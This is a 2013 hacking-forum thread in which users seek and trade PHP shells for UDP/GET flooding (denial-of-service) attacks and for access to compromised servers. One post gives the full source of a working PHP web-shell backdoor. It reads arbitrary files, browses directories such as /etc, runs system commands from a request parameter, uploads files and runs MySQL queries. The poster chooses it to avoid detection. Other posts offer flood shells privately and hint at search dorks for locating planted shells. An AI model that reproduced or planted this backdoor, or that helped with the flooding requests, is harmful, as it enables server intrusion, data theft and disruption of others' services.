Php DoSing shell?

ErroraBorealis · 05-16-2013, 08:52 PM

Does anyone have a php shell file that can be used for UDP or GET flooding along with your favorite shell for file uploading? I can't seem to find a flooding shell anywhere...i can find lots of other ones...and ones already uploaded...but I need the php file.
Sorry to be leeching more so than contributing...I'm working on it.

Unmasked · 05-16-2013, 09:36 PM

I can ask my friend zer0 if I can give his out, it's pretty sick it uses some reflection shit from his personal servers. lol I know the google dork to find his XD he mad but yea there is like 7pages on google to find his. (Hint he speaks danish and it's something like "intext: **** *** zer0")

Anyways I will hit him up on xmpp later I got some work to do.

ErroraBorealis · 05-16-2013, 10:02 PM

(05-16-2013, 09:36 PM)Unmasked Wrote: I can ask my friend zer0 if I can give his out, it's pretty sick it uses some reflection shit from his personal servers. lol I know the google dork to find his XD he mad but yea there is like 7pages on google to find his. (Hint he speaks danish and it's something like "intext: **** *** zer0")

Anyways I will hit him up on xmpp later I got some work to do.

Thanks. I dont have the time to guess two words right now to get it, but i might later. And if you can't get him to let it be out in public, i won't give it to anyone if you can get a hold of it. I just need something decent to use that can't be found by every skid out there.

Charon · 05-17-2013, 05:08 PM

I got a UDP flood shell I could give you, sending you a PM now.

Unmasked · 05-17-2013, 06:08 PM

(05-16-2013, 10:02 PM)Sinisterkid Wrote: Thanks. I dont have the time to guess two words right now to get it, but i might later. And if you can't get him to let it be out in public, i won't give it to anyone if you can get a hold of it. I just need something decent to use that can't be found by every skid out there.

Yeaaaa he said "Errrrm no." :-\ sorry about that Stressed

ErroraBorealis · 05-17-2013, 06:10 PM

(05-17-2013, 06:08 PM)Unmasked Wrote: Yeaaaa he said "Errrrm no." :-\ sorry about that

Its fine, I have the DoSing shell...just need to find one to gain file access and such with.

Nefarious · 05-17-2013, 08:03 PM

(05-17-2013, 06:10 PM)Sinisterkid Wrote: Its fine, I have the DoSing shell...just need to find one to gain file access and such with.

Search for I-47

Unmasked · 05-17-2013, 08:56 PM

(05-17-2013, 06:10 PM)Sinisterkid Wrote: Its fine, I have the DoSing shell...just need to find one to gain file access and such with.

File access? just use a reg. shell, I use this one (It's a very plain vanilla backdoor) I don't use any shell with auto pwn or built in backconnect cause it will get flagged.

PHP Code:
<?php
ob_implicit_flush();
if(isset($_REQUEST['f'])){
        $filename=$_REQUEST['f'];
        $file=fopen("$filename","rb");
        fpassthru($file);
        die;
}
if(isset($_REQUEST['d'])){
        $d=$_REQUEST['d'];
        echo "<pre>";
        if ($handle = opendir("$d")) {
        echo "<h2>listing of $d</h2>";
                   while ($dir = readdir($handle)){ 
                       if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
                            else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
                       echo "$dir\n"; 
                       echo "</font></a>";
                }
                       
        } else echo "opendir() failed";
        closedir($handle);
        die ("<hr>"); 
}
if(isset($_REQUEST['c'])){
    echo "<pre>";
    system($_REQUEST['c']);           
    die;
}
if(isset($_REQUEST['upload'])){

        if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
            else $dir=$_REQUEST['dir'];
        $fname=$HTTP_POST_FILES['file_name']['name'];
        if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
            die('file uploading error.');
}
if(isset($_REQUEST['mquery'])){
    
    $host=$_REQUEST['host'];
    $usr=$_REQUEST['usr'];
    $passwd=$_REQUEST['passwd'];
    $db=$_REQUEST['db'];
    $mquery=$_REQUEST['mquery'];
    mysql_connect("$host", "$usr", "$passwd") or
    die("Could not connect: " . mysql_error());
    mysql_select_db("$db");
    $result = mysql_query("$mquery");
    if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
    while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
    mysql_free_result($result);
    die;
}
?>
<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
<br>for example:
http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
<hr>execute mysql query:
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">

database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
</form> 

BreShiE · 05-17-2013, 09:06 PM

(05-17-2013, 08:03 PM)Kirito Wrote: Search for I-47

Why would you recommend a Trojan backdoor shell for the use of DDoS attacks?

Unmasked · 05-17-2013, 09:11 PM

(05-17-2013, 09:06 PM)Entity Wrote: Why would you recommend a Trojan backdoor shell for the use of DDoS attacks?

Where did he recommend that for a DoS shell (not ddos)?

He was simply replying to this

(05-17-2013, 06:10 PM)Sinisterkid Wrote: Its fine, I have the DoSing shell...just need to find one to gain file access and such with.

Php DoSing shell?
Author Message